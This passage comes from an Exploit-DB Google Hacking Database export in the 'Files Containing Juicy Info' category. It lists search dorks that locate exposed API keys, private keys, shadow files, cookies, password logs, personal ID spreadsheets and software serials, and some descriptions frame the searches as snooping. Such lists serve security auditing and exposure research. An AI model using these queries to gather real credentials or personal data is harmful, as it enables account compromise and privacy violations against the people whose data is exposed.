<query>'AUTH_SALT' | 'SECURE_AUTH_SALT' | 'LOGGED_IN_SALT' | 'NONCE_SALT' ext:txt | ext:cfg | ext:env | ext:ini</query>
<querystring>https://www.google.com/search?q='AUTH_SALT' | 'SECURE_AUTH_SALT' | 'LOGGED_IN_SALT' | 'NONCE_SALT' ext:txt | ext:cfg | ext:env | ext:ini</querystring>
<edb></edb>
<date>2020-09-03</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>455</id>
<link>https://www.exploit-db.com/ghdb/455</link>
<category>Files Containing Juicy Info</category>
<shortDescription>( filetype:mail | filetype:eml | filetype:mbox | filetype:mbx ) intext:password|subject</shortDescription>
<textualDescription>storing emails in your webtree isnt a good idea.with this search google will show files containing emails like mail,eml,mbox or mbx with the keywords&quot;password&quot; or &quot;subject&quot; in the mail data.</textualDescription>
<query>( filetype:mail | filetype:eml | filetype:mbox | filetype:mbx ) intext:password|subject</query>
<querystring>https://www.google.com/search?hl=de&amp;q=%28+filetype%3Amail+%7C+filetype%3Aeml+%7C+filetype%3Ambox+%7C+filetype%3Ambx+%29+intext%3Apassword%7Csubject+&amp;btnG=Google-Suche</querystring>
<edb></edb>
<date>2004-08-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>3952</id>
<link>https://www.exploit-db.com/ghdb/3952</link>
<category>Files Containing Juicy Info</category>
<shortDescription>(&quot;DMZ&quot; | &quot;Public IP&quot; | &quot;Private IP&quot;) filetype:xls</shortDescription>
<textualDescription>Files with information DMZ, public IP, private IP network segments, etc.
Daniel Maldonado
http://caceriadespammers.com.ar</textualDescription>
<query>(&quot;DMZ&quot; | &quot;Public IP&quot; | &quot;Private IP&quot;) filetype:xls</query>
<querystring>https://www.google.com/search?q=(&quot;DMZ&quot; | &quot;Public IP&quot; | &quot;Private IP&quot;) filetype:xls</querystring>
<edb></edb>
<date>2014-06-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>8298</id>
<link>https://www.exploit-db.com/ghdb/8298</link>
<category>Files Containing Juicy Info</category>
<shortDescription>(&quot;_API_KEY=&quot;sk-&quot;)</shortDescription>
<textualDescription># Google Dork: (&quot;_API_KEY=&quot;sk-&quot;)
# Files Containing Juicy Info
# Date: 01/11/2023
# Exploit: Teddy</textualDescription>
<query>Open API Keys</query>
<querystring>https://www.google.com/search?q=Open API Keys</querystring>
<edb></edb>
<date>2023-11-01</date>
<author>Teddy</author>
</entry>
<entry>
<id>4344</id>
<link>https://www.exploit-db.com/ghdb/4344</link>
<category>Files Containing Juicy Info</category>
<shortDescription>(@gmail.com || @yahoo.com || @hotmail.com) ext:php inurl:compose</shortDescription>
<textualDescription>Names of mail accounts and other data of webmail servers.
Enjoy Healthy.
Dork by Rootkit Pentester.</textualDescription>
<query>(@gmail.com || @yahoo.com || @hotmail.com) ext:php inurl:compose</query>
<querystring>https://www.google.com/search?q=(@gmail.com || @yahoo.com || @hotmail.com) ext:php inurl:compose</querystring>
<edb></edb>
<date>2016-10-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>3965</id>
<link>https://www.exploit-db.com/ghdb/3965</link>
<category>Files Containing Juicy Info</category>
<shortDescription>(intext:mail AND intext:samAccountName) AND (filetype:xlsx OR filetype:xls OR filetype:csv OR filetype:txt)</shortDescription>
<textualDescription>Search for samAccountName (an ActiveDirectory attribute). 50/50 success, some usernames disclosed along with other information.
</textualDescription>
<query>(intext:mail AND intext:samAccountName) AND (filetype:xlsx OR filetype:xls OR filetype:csv OR filetype:txt)</query>
<querystring>https://www.google.com/search?q=(intext:mail AND intext:samAccountName) AND (filetype:xlsx OR filetype:xls OR filetype:csv OR filetype:txt)</querystring>
<edb></edb>
<date>2014-10-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>1278</id>
<link>https://www.exploit-db.com/ghdb/1278</link>
<category>Files Containing Juicy Info</category>
<shortDescription>(intitle:&quot;PRTG Traffic Grapher&quot; inurl:&quot;allsensors&quot;)|(intitle:&quot;PRTG Traffic Grapher - Monitoring Results&quot;)</shortDescription>
<textualDescription>PRTG Traffic Grapher is Windows software for monitoring and classifying bandwidth usage. It provides system administrators with live readings and long-term usage trends for their network devices. The most common usage is bandwidth usage monitoring, but you can also monitor many other aspects of your network like memory and CPU utilizations.</textualDescription>
<query>(intitle:&quot;PRTG Traffic Grapher&quot; inurl:&quot;allsensors&quot;)|(intitle:&quot;PRTG Traffic Grapher - Monitoring Results&quot;)</query>
<querystring>https://www.google.com/search?num=50&amp;q=%28intitle%3A%22PRTG+Traffic+Grapher%22+inurl%3A%22allsensors%22%29%7C%28intitle%3A%22PRTG+Traffic+Grapher+-+Monitoring+Results%22%29</querystring>
<edb></edb>
<date>2006-03-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>1226</id>
<link>https://www.exploit-db.com/ghdb/1226</link>
<category>Files Containing Juicy Info</category>
<shortDescription>(intitle:WebStatistica inurl:main.php) | (intitle:&quot;WebSTATISTICA server&quot;) -inurl:statsoft -inurl:statsoftsa -inurl:statsoftinc.com -edu -software -rob</shortDescription>
<textualDescription>WebStatistica provides detailed statistics about a web page. Normally you would have to login to view these statistics but the sites have put autologin on.</textualDescription>
<query>(intitle:WebStatistica inurl:main.php) | (intitle:&quot;WebSTATISTICA server&quot;) -inurl:statsoft -inurl:statsoftsa -inurl:statsoftinc.com -edu -software -rob</query>
<querystring>https://www.google.com/search?num=100&amp;q=%28intitle%3AWebStatistica+inurl%3Amain.php%29+%7C+%28intitle%3A%22WebSTATISTICA+server%22%29+-inurl%3Astatsoft+-inurl%3Astatsoftsa+-inurl%3Astatsoftinc.com+-edu+-software+-rob_2926+-crack.ru+-edeco.cn</querystring>
<edb></edb>
<date>2005-12-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>417</id>
<link>https://www.exploit-db.com/ghdb/417</link>
<category>Files Containing Juicy Info</category>
<shortDescription>(inurl:&quot;robot.txt&quot; | inurl:&quot;robots.txt&quot; ) intext:disallow filetype:txt</shortDescription>
<textualDescription>Webmasters wanting to exclude search engine robots from certain parts of their site often choose the use of a robot.txt file on the root of the server. This file basicly tells the bot which directories are supposed to be off-limits.An attacker can easily obtain that information by very simply opening that plain text file in his browser. Webmasters should *never* rely on this for real security issues. Google helps the attacker by allowing a search for the &quot;disallow&quot; keyword.</textualDescription>
<query>(inurl:&quot;robot.txt&quot; | inurl:&quot;robots.txt&quot; ) intext:disallow filetype:txt</query>
<querystring>https://www.google.com/search?num=100&amp;q=%28inurl%3A%22robot.txt%22+%7C+inurl%3A%22robots.txt%22+%29+intext%3Adisallow+filetype%3Atxt</querystring>
<edb></edb>
<date>2004-08-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>522</id>
<link>https://www.exploit-db.com/ghdb/522</link>
<category>Files Containing Juicy Info</category>
<shortDescription>+&quot;:8080&quot; +&quot;:3128&quot; +&quot;:80&quot; filetype:txt</shortDescription>
<textualDescription>With the string [+&quot;:8080&quot; +&quot;:3128&quot; +&quot;:80&quot; filetype:txt] it is possible to find huge lists of proxies... So, I've written a simple shell script that checks these lists and filters out the not responding proxies. It also stores time response in another file, so you can choose only fast proxies. Furthermore it can control the zone of the proxy with a simple whois grep... The script proxytest.sh is on my website:http://rawlab.relay.homelinux.net/programmi/proxytest.sh</textualDescription>
<query>+&quot;:8080&quot; +&quot;:3128&quot; +&quot;:80&quot; filetype:txt</query>
<querystring>https://www.google.com/search?q=%2B%22%3A8080%22+%2B%22%3A3128%22+%2B%22%3A80%22+filetype%3Atxt</querystring>
<edb></edb>
<date>2004-09-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>872</id>
<link>https://www.exploit-db.com/ghdb/872</link>
<category>Files Containing Juicy Info</category>
<shortDescription>+&quot;HSTSNR&quot; -&quot;netop.com&quot;</shortDescription>
<textualDescription>This search reveals NetOp license files. From the netop website: &quot;NetOp Remote Control is the most comprehensive, effective and security-conscious way to maintain your IT operations. Designed to fit into all environments, NetOp lets you access users running virtually any operating system, including Windows, Linux, Mac OS X and Solaris. Location isn’t terribly important either. The program offers unrivalled connectivity, supporting all standard communication protocols. Finally, NetOp is also the ideal way to manage and administrate your servers. The system contains a sweeping range of remote management tools, all available on one easy-to-use console.&quot;</textualDescription>
<query>+&quot;HSTSNR&quot; -&quot;netop.com&quot;</query>
<querystring>https://www.google.com/search?q=%2B%22HSTSNR%22+-%22netop.com%22&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2005-02-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>3741</id>
<link>https://www.exploit-db.com/ghdb/3741</link>
<category>Files Containing Juicy Info</category>
<shortDescription>+intext:&quot;AWSTATS DATA FILE&quot; filetype:txt</shortDescription>
<textualDescription>Shows data downloads containing statistics on the site.Made by AwstatsThe best dork for that system.By: 67pc </textualDescription>
<query>+intext:&quot;AWSTATS DATA FILE&quot; filetype:txt</query>
<querystring>https://www.google.com/search?q=+intext:&quot;AWSTATS DATA FILE&quot; filetype:txt</querystring>
<edb></edb>
<date>2011-09-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>4138</id>
<link>https://www.exploit-db.com/ghdb/4138</link>
<category>Files Containing Juicy Info</category>
<shortDescription>-inurl:http | -inurl:https inurl:ftp ext:xls | ext:xlsx bank</shortDescription>
<textualDescription>Lots of interesting stuff!
Decoy</textualDescription>
<query>-inurl:http | -inurl:https inurl:ftp ext:xls | ext:xlsx bank</query>
<querystring>https://www.google.com/search?q=-inurl:http | -inurl:https inurl:ftp ext:xls | ext:xlsx bank</querystring>
<edb></edb>
<date>2015-11-23</date>
<author>anonymous</author>
</entry>
<entry>
<id>5719</id>
<link>https://www.exploit-db.com/ghdb/5719</link>
<category>Files Containing Juicy Info</category>
<shortDescription>-pub -pool intitle:&quot;index of&quot; db.key OR server.key OR ftp.key OR exchange.key OR host.key OR mail.key</shortDescription>
<textualDescription>This dork will give you a lot of private keys are also known as a secret
keys.
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>-pub -pool intitle:&quot;index of&quot; db.key OR server.key OR ftp.key OR exchange.key OR host.key OR mail.key</query>
<querystring>https://www.google.com/search?q=-pub -pool intitle:&quot;index of&quot; db.key OR server.key OR ftp.key OR exchange.key OR host.key OR mail.key</querystring>
<edb></edb>
<date>2020-01-29</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>860</id>
<link>https://www.exploit-db.com/ghdb/860</link>
<category>Files Containing Juicy Info</category>
<shortDescription>-site:php.net -&quot;The PHP Group&quot; inurl:source inurl:url ext:pHp</shortDescription>
<textualDescription>scripts to view the source code of PHP scripts running on the server. Can be very interesting if it is also allowed to open configuration files ;-)</textualDescription>
<query>-site:php.net -&quot;The PHP Group&quot; inurl:source inurl:url ext:pHp</query>
<querystring>https://www.google.com/search?q=-site%3Aphp.net+-%22The+PHP+Group%22+inurl%3Asource++inurl%3Aurl+ext%3ApHp</querystring>
<edb></edb>
<date>2005-02-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>4910</id>
<link>https://www.exploit-db.com/ghdb/4910</link>
<category>Files Containing Juicy Info</category>
<shortDescription>-site:smarty.net ext:tpl intext:&quot;</shortDescription>
<textualDescription>-site:smarty.net ext:tpl intext:&quot;</textualDescription>
<query>-site:smarty.net ext:tpl intext:&quot;</query>
<querystring>https://www.google.com/search?q=-site:smarty.net ext:tpl intext:&quot;</querystring>
<edb></edb>
<date>2018-08-08</date>
<author>Aamir Rehman</author>
</entry>
<entry>
<id>4957</id>
<link>https://www.exploit-db.com/ghdb/4957</link>
<category>Files Containing Juicy Info</category>
<shortDescription>/var/www/manage/storage/logs/laravel- ext:log</shortDescription>
<textualDescription>Laravel logs
ManhNho
</textualDescription>
<query>/var/www/manage/storage/logs/laravel- ext:log</query>
<querystring>https://www.google.com/search?q=/var/www/manage/storage/logs/laravel- ext:log</querystring>
<edb></edb>
<date>2018-09-18</date>
<author>ManhNho</author>
</entry>
<entry>
<id>281</id>
<link>https://www.exploit-db.com/ghdb/281</link>
<category>Files Containing Juicy Info</category>
<shortDescription>94FBR &quot;ADOBE PHOTOSHOP&quot;</shortDescription>
<textualDescription>94FBR is part of many serials. An malicious user would only have to change the programm name (photoshop in this example) in this search to find a perfectly valid serial.Other values to look for are: GC6J3. GTQ62. FP876. D3DX8.</textualDescription>
<query>94FBR &quot;ADOBE PHOTOSHOP&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=94FBR+%22ADOBE+PHOTOSHOP%22</querystring>
<edb></edb>
<date>2004-06-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>7864</id>
<link>https://www.exploit-db.com/ghdb/7864</link>
<category>Files Containing Juicy Info</category>
<shortDescription>=?UTF-8?Q?intitle:&quot;Index_of=E2=80=9D_etc/shadow?=</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Index of” etc/shadow
# Files Containing Juicy Info
# Date: 02/12/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;Index of&quot; etc/shadow</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of&quot; etc/shadow</querystring>
<edb></edb>
<date>2022-06-15</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>7862</id>
<link>https://www.exploit-db.com/ghdb/7862</link>
<category>Files Containing Juicy Info</category>
<shortDescription>=?UTF-8?Q?intitle:&quot;Index_of=E2=80=9D_user=5Fcarts_OR_user_=5Fcart.?=</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Index of” user_carts OR user _cart.
# Files Containing Juicy Info
# Date: 02/12/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>=?UTF-8?Q?intitle:&quot;Index_of=E2=80=9D_user=5Fcarts_OR_user_=5Fcart.?=</query>
<querystring>https://www.google.com/search?q==?UTF-8?Q?intitle:&quot;Index_of=E2=80=9D_user=5Fcarts_OR_user_=5Fcart.?=</querystring>
<edb></edb>
<date>2022-06-15</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>3780</id>
<link>https://www.exploit-db.com/ghdb/3780</link>
<category>Files Containing Juicy Info</category>
<shortDescription>?intitle:index.of?&quot;.mysql_history&quot;</shortDescription>
<textualDescription>Find some juicy info in .mysql_history files
enjoy
bastich</textualDescription>
<query>?intitle:index.of?&quot;.mysql_history&quot;</query>
<querystring>https://www.google.com/search?q=?intitle:index.of?&quot;.mysql_history&quot;</querystring>
<edb></edb>
<date>2012-05-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>5724</id>
<link>https://www.exploit-db.com/ghdb/5724</link>
<category>Files Containing Juicy Info</category>
<shortDescription>accdb OR accde intitle:&quot;index of&quot; -pub -google -books</shortDescription>
<textualDescription>Dork gives Microsoft Access databases.
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>accdb OR accde intitle:&quot;index of&quot; -pub -google -books</query>
<querystring>https://www.google.com/search?q=accdb OR accde intitle:&quot;index of&quot; -pub -google -books</querystring>
<edb></edb>
<date>2020-02-03</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>26</id>
<link>https://www.exploit-db.com/ghdb/26</link>
<category>Files Containing Juicy Info</category>
<shortDescription>AIM buddy lists</shortDescription>
<textualDescription>These searches bring up common names for AOL Instant Messenger &quot;buddylists&quot;. These lists contain screen names of your &quot;online buddies&quot; in Instant Messenger. Not that's not too terribly exciting or stupid unless you want to mess with someone's mind, and besides, some people make these public on purpose. The thing that's interesting are the files that get stored ALONG WITH buddylists. Often this stuff includes downloaded pictures, resumes, all sorts of things. This is really for the peepers out there, and it' possible to spend countless hours rifling through people's personal crap. Also try buddylist.blt, buddy.blt, buddies.blt.</textualDescription>
<query>buddylist.blt</query>
<querystring>https://www.google.com/search?q=buddylist%2Eblt</querystring>
<edb></edb>
<date>2003-06-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>7807</id>
<link>https://www.exploit-db.com/ghdb/7807</link>
<category>Files Containing Juicy Info</category>
<shortDescription>allintext&quot;account number&quot;</shortDescription>
<textualDescription># Google Dork: allintext&quot;account number&quot;
# Files Containing Juicy Info
# Date:15/11/2021
# Exploit Author: Smita Dhanokar</textualDescription>
<query>allintext&quot;account number&quot;</query>
<querystring>https://www.google.com/search?q=allintext&quot;account number&quot;</querystring>
<edb></edb>
<date>2021-11-15</date>
<author>Smita Dhanokar</author>
</entry>
<entry>
<id>3852</id>
<link>https://www.exploit-db.com/ghdb/3852</link>
<category>Files Containing Juicy Info</category>
<shortDescription>allintext: /iissamples/default/</shortDescription>
<textualDescription>Searching for &quot;allintext: /iissamples/default/&quot; may provide interesting
information about a mis-configured .asp server including raw source code
for asp, directory structure and the IIS version ( especially useful when
IIS is running on NT 4.0)
the result provides a way to further explore directory structure for juicy
info.
Oleg.</textualDescription>
<query>allintext: /iissamples/default/</query>
<querystring>https://www.google.com/search?q=allintext: /iissamples/default/</querystring>
<edb></edb>
<date>2013-04-23</date>
<author>anonymous</author>
</entry>
<entry>
<id>6470</id>
<link>https://www.exploit-db.com/ghdb/6470</link>
<category>Files Containing Juicy Info</category>
<shortDescription>allintext:&quot;API_SECRET*&quot; ext:env | ext:yml</shortDescription>
<textualDescription># Google Dork: allintext:&quot;API_SECRET*&quot; ext:env | ext:yml
# Juicy info.
# Date: 10/08/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>allintext:&quot;API_SECRET*&quot; ext:env | ext:yml</query>
<querystring>https://www.google.com/search?q=allintext:&quot;API_SECRET*&quot; ext:env | ext:yml</querystring>
<edb></edb>
<date>2020-08-10</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>7359</id>
<link>https://www.exploit-db.com/ghdb/7359</link>
<category>Files Containing Juicy Info</category>
<shortDescription>allintext:&quot;Call to undefined function&quot;</shortDescription>
<textualDescription># Google Dork: allintext:&quot;Call to undefined function&quot;
# Files Containing Juicy Info
# Date:02/08/2021
# Exploit Author: Adam Wallwork</textualDescription>
<query>allintext:&quot;Call to undefined function&quot;</query>
<querystring>https://www.google.com/search?q=allintext:&quot;Call to undefined function&quot;</querystring>
<edb></edb>
<date>2021-09-30</date>
<author>Adam Wallwork</author>
</entry>
<entry>
<id>6635</id>
<link>https://www.exploit-db.com/ghdb/6635</link>
<category>Files Containing Juicy Info</category>
<shortDescription>allintext:&quot;Index Of&quot; &quot;cookies.txt&quot;</shortDescription>
<textualDescription># Exploit Title: *allintext:&quot;Index Of&quot; &quot;cookies.txt&quot;*
# Google Dork: *allintext:&quot;Index Of&quot; &quot;cookies.txt&quot;*
# Juicy information : Valuable cookie information.
# Date: 25/10/2020
# Exploit Author: Sajan Dhakate
*Thanks &amp; Regards*
*Sajan Dhakate*
</textualDescription>
<query>allintext:&quot;Index Of&quot; &quot;cookies.txt&quot;</query>
<querystring>https://www.google.com/search?q=allintext:&quot;Index Of&quot; &quot;cookies.txt&quot;</querystring>
<edb></edb>
<date>2020-10-26</date>
<author>Sajan Dhakate</author>
</entry>
<entry>
<id>6612</id>
<link>https://www.exploit-db.com/ghdb/6612</link>
<category>Files Containing Juicy Info</category>
<shortDescription>allintext:&quot;index of&quot; &quot;oauth-private.key&quot;</shortDescription>
<textualDescription>Dear Team,
# Exploit Title: allintext:&quot;index of&quot; &quot;oauth-private.key&quot;
# Google Dork: allintext:&quot;index of&quot; &quot;oauth-private.key&quot;
# Exposed Oauth Private Keys
# Date: 14/10/2020
# Exploit Author: Sajan Dhakate
Please find the attached txt file.
*Thanks &amp; Regards*
*Sajan Dhakate*
</textualDescription>
<query>allintext:&quot;index of&quot; &quot;oauth-private.key&quot;</query>
<querystring>https://www.google.com/search?q=allintext:&quot;index of&quot; &quot;oauth-private.key&quot;</querystring>
<edb></edb>
<date>2020-10-14</date>
<author>Sajan Dhakate</author>
</entry>
<entry>
<id>7358</id>
<link>https://www.exploit-db.com/ghdb/7358</link>
<category>Files Containing Juicy Info</category>
<shortDescription>allintext:&quot;[Sec. Info]&quot; file.php</shortDescription>
<textualDescription># Google Dork: allintext:&quot;[Sec. Info]&quot; file.php
# Files Containing Juicy Info
# Date:02/08/2021
# Exploit Author: Adam Wallwork</textualDescription>
<query>allintext:&quot;[Sec. Info]&quot; file.php</query>
<querystring>https://www.google.com/search?q=allintext:&quot;[Sec. Info]&quot; file.php</querystring>
<edb></edb>
<date>2021-09-30</date>
<author>Adam Wallwork</author>
</entry>
<entry>
<id>6745</id>
<link>https://www.exploit-db.com/ghdb/6745</link>
<category>Files Containing Juicy Info</category>
<shortDescription>allintext:@gmail.com filetype:log</shortDescription>
<textualDescription># Author: - Rushabh Doshi (https://www.linkedin.com/in/rushabh1998)
# Category: - juicy information
# Description: - This dork returns the logs which contains sensitive information like email addresses, timestamp and passwords
# Google Dork: - allintext:@gmail.com filetype:log
# Date: - 26/12/2020
</textualDescription>
<query>allintext:@gmail.com filetype:log</query>
<querystring>https://www.google.com/search?q=allintext:@gmail.com filetype:log</querystring>
<edb></edb>
<date>2021-01-07</date>
<author>Rushabh Doshi</author>
</entry>
<entry>
<id>7195</id>
<link>https://www.exploit-db.com/ghdb/7195</link>
<category>Files Containing Juicy Info</category>
<shortDescription>allintext:adhaar filetype:xlsx</shortDescription>
<textualDescription># Google Dork: allintext:adhaar filetype:xlsx
# Files Containing Juicy Info
# Date: 04/09/2021
# Exploit Author: Seecko Das</textualDescription>
<query>allintext:adhaar filetype:xlsx</query>
<querystring>https://www.google.com/search?q=allintext:adhaar filetype:xlsx</querystring>
<edb></edb>
<date>2021-09-14</date>
<author>Seecko Das</author>
</entry>
<entry>
<id>3769</id>
<link>https://www.exploit-db.com/ghdb/3769</link>
<category>Files Containing Juicy Info</category>
<shortDescription>allintext:D.N.I filetype:xls</shortDescription>
<textualDescription>This Query contains sensitive data (D.N.I ;-) ) in a xls format (excel) and D.N.I for People of the Anses !
Author: Luciano UNLP
</textualDescription>
<query>allintext:D.N.I filetype:xls</query>
<querystring>https://www.google.com/search?q=allintext:D.N.I filetype:xls</querystring>
<edb></edb>
<date>2011-12-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>8220</id>
<link>https://www.exploit-db.com/ghdb/8220</link>
<category>Files Containing Juicy Info</category>
<shortDescription>allintext:static/uploads</shortDescription>
<textualDescription># Google Dork: allintext:static/uploads
# Files Containing Juicy Info
# Date: 07/09/2023
# Exploit Author: Affan Ali</textualDescription>
<query>allintext:static/uploads</query>
<querystring>https://www.google.com/search?q=allintext:static/uploads</querystring>
<edb></edb>
<date>2023-09-07</date>
<author>Affan Ali</author>
</entry>
<entry>
<id>6412</id>
<link>https://www.exploit-db.com/ghdb/6412</link>
<category>Files Containing Juicy Info</category>
<shortDescription>allintext:username,password filetype:log</shortDescription>
<textualDescription>allintext:username,password filetype:log
</textualDescription>
<query>allintext:username,password filetype:log</query>
<querystring>https://www.google.com/search?q=allintext:username,password filetype:log</querystring>
<edb></edb>
<date>2020-07-16</date>
<author>isa ghojaria</author>
</entry>
<entry>
<id>4672</id>
<link>https://www.exploit-db.com/ghdb/4672</link>
<category>Files Containing Juicy Info</category>
<shortDescription>allintitle:&quot;Forum Post Assistant :&quot; ext:php -site:joomla.org</shortDescription>
<textualDescription>allintitle:&quot;Forum Post Assistant :&quot; ext:php -site:joomla.org
The above dork will open joomla forum assistant. Which discloses alot of information like;DB name, DB version, Server internal path , PHP version, Platform, Kernal version, Enabled PHP Extensions etc.
Aamir Rehman
</textualDescription>
<query>allintitle:&quot;Forum Post Assistant :&quot; ext:php -site:joomla.org</query>
<querystring>https://www.google.com/search?q=allintitle:&quot;Forum Post Assistant :&quot; ext:php -site:joomla.org</querystring>
<edb></edb>
<date>2018-02-14</date>
<author>Aamir Rehman</author>
</entry>
<entry>
<id>8233</id>
<link>https://www.exploit-db.com/ghdb/8233</link>
<category>Files Containing Juicy Info</category>
<shortDescription>allintitle:&quot;macOS Server&quot; site:.com</shortDescription>
<textualDescription># Google Dork: allintitle:&quot;macOS Server&quot; site:.com
# Files Containing Juicy Info
# Date: 11/09/2023
# Exploit Kamlesh Pendurkar</textualDescription>
<query>For Google dork</query>
<querystring>https://www.google.com/search?q=For Google dork</querystring>
<edb></edb>
<date>2023-09-11</date>
<author>Kamlesh Pendurkar</author>
</entry>
<entry>
<id>8200</id>
<link>https://www.exploit-db.com/ghdb/8200</link>
<category>Files Containing Juicy Info</category>
<shortDescription>allintitle:&quot;macOS Server&quot; site:.edu</shortDescription>
<textualDescription># Google Dork: allintitle:&quot;macOS Server&quot; site:.edu
# Files Containing Juicy Info
# Date:31/05/2023
# Exploit Author: Thomas Heverin</textualDescription>
<query>allintitle:&quot;macOS Server&quot; site:.edu</query>
<querystring>https://www.google.com/search?q=allintitle:&quot;macOS Server&quot; site:.edu</querystring>
<edb></edb>
<date>2023-05-31</date>
<author>Thomas Heverin</author>
</entry>
<entry>
<id>8097</id>
<link>https://www.exploit-db.com/ghdb/8097</link>
<category>Files Containing Juicy Info</category>
<shortDescription>allintitle:&quot;ProjectDox Login&quot;</shortDescription>
<textualDescription># Google Dork: allintitle:&quot;ProjectDox Login&quot;
# Files Containing Juicy Info
# Date:28/02/2023
# Exploit Author: GirlsLearnCyber</textualDescription>
<query>allintitle:&quot;ProjectDox Login&quot;</query>
<querystring>https://www.google.com/search?q=allintitle:&quot;ProjectDox Login&quot;</querystring>
<edb></edb>
<date>2023-02-28</date>
<author>GirlsLearnCyber</author>
</entry>
<entry>
<id>8123</id>
<link>https://www.exploit-db.com/ghdb/8123</link>
<category>Files Containing Juicy Info</category>
<shortDescription>allintitle:&quot;VidyoRouter Configuration&quot;</shortDescription>
<textualDescription># Google Dork: allintitle:&quot;VidyoRouter Configuration&quot;
# Files Containing Juicy Info
# Date:24/03/2023
# Exploit Author: Heverin Hacker</textualDescription>
<query>allintitle:&quot;VidyoRouter Configuration&quot;</query>
<querystring>https://www.google.com/search?q=allintitle:&quot;VidyoRouter Configuration&quot;</querystring>
<edb></edb>
<date>2023-03-24</date>
<author>Heverin Hacker</author>
</entry>
<entry>
<id>7849</id>
<link>https://www.exploit-db.com/ghdb/7849</link>
<category>Files Containing Juicy Info</category>
<shortDescription>allintitle:index of &quot;/icewarp&quot;</shortDescription>
<textualDescription># Google Dork: allintitle:index of &quot;/icewarp&quot;
# Files Containing Juicy Info
# Date:14/06/2022
# Exploit Author: AFFAN AHMED</textualDescription>
<query>allintitle:index of &quot;/icewarp&quot;</query>
<querystring>https://www.google.com/search?q=allintitle:index of &quot;/icewarp&quot;</querystring>
<edb></edb>
<date>2022-06-14</date>
<author>AFFAN AHMED</author>
</entry>
<entry>
<id>7850</id>
<link>https://www.exploit-db.com/ghdb/7850</link>
<category>Files Containing Juicy Info</category>
<shortDescription>allintitle:index of &quot;/microweber&quot;</shortDescription>
<textualDescription># Google Dork: allintitle:index of &quot;/microweber&quot;
# Files Containing Juicy Info
# Date:14/06/2022
# Exploit Author: AFFAN AHMED</textualDescription>
<query>allintitle:index of &quot;/microweber&quot;</query>
<querystring>https://www.google.com/search?q=allintitle:index of &quot;/microweber&quot;</querystring>
<edb></edb>
<date>2022-06-14</date>
<author>AFFAN AHMED</author>
</entry>
<entry>
<id>7346</id>
<link>https://www.exploit-db.com/ghdb/7346</link>
<category>Files Containing Juicy Info</category>
<shortDescription>allintitle:Index of /wp-includes/</shortDescription>
<textualDescription># Google Dork: allintitle:Index of /wp-includes/
# Files Containing Juicy Info
# Date:24/09/2021
# Exploit Author: Raj Zamal</textualDescription>
<query>allintitle:Index of /wp-includes/</query>
<querystring>https://www.google.com/search?q=allintitle:Index of /wp-includes/</querystring>
<edb></edb>
<date>2021-09-30</date>
<author>Raj Zamal</author>
</entry>
<entry>
<id>4855</id>
<link>https://www.exploit-db.com/ghdb/4855</link>
<category>Files Containing Juicy Info</category>
<shortDescription>allintitle:restricted filetype:doc site:gov</shortDescription>
<textualDescription>Some juicy Information
Author: Subhash Rawat
</textualDescription>
<query>allintitle:restricted filetype:doc site:gov</query>
<querystring>https://www.google.com/search?q=allintitle:restricted filetype:doc site:gov</querystring>
<edb></edb>
<date>2018-06-14</date>
<author>Subhash Rawat</author>
</entry>
<entry>
<id>4372</id>
<link>https://www.exploit-db.com/ghdb/4372</link>
<category>Files Containing Juicy Info</category>
<shortDescription>allinurl: drive.google.com/open?id=</shortDescription>
<textualDescription>Hi!, i discovered this exploit that gets some juicy documents and data from
users shared google drive.
Don't know if it's already uploaded but of course, the exploit is still
working of course,
Cheers.
Niko Onek</textualDescription>
<query>allinurl: drive.google.com/open?id=</query>
<querystring>https://www.google.com/search?q=allinurl: drive.google.com/open?id=</querystring>
<edb></edb>
<date>2016-12-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>8350</id>
<link>https://www.exploit-db.com/ghdb/8350</link>
<category>Files Containing Juicy Info</category>
<shortDescription>allinurl:&quot;add_vhost.php?lang=english&quot;</shortDescription>
<textualDescription># Google Dork: allinurl:&quot;add_vhost.php?lang=english&quot;
# Files Containing Juicy Info
# Date: 20/11/2023
# Exploit: Saleh Lardhi</textualDescription>
<query>allinurl:&quot;add_vhost.php?lang=english&quot;</query>
<querystring>https://www.google.com/search?q=allinurl:&quot;add_vhost.php?lang=english&quot;</querystring>
<edb></edb>
<date>2023-11-20</date>
<author>Saleh Lardhi</author>
</entry>
<entry>
<id>169</id>
<link>https://www.exploit-db.com/ghdb/169</link>
<category>Files Containing Juicy Info</category>
<shortDescription>allinurl:/examples/jsp/snp/snoop.jsp</shortDescription>
<textualDescription>These pages reveal information about the server including path information, port information, etc.</textualDescription>
<query>allinurl:/examples/jsp/snp/snoop.jsp</query>
<querystring>https://www.google.com/search?q=allinurl%3A%2Fexamples%2Fjsp%2Fsnp%2Fsnoop%2Ejsp</querystring>
<edb></edb>
<date>2004-04-20</date>
<author>anonymous</author>
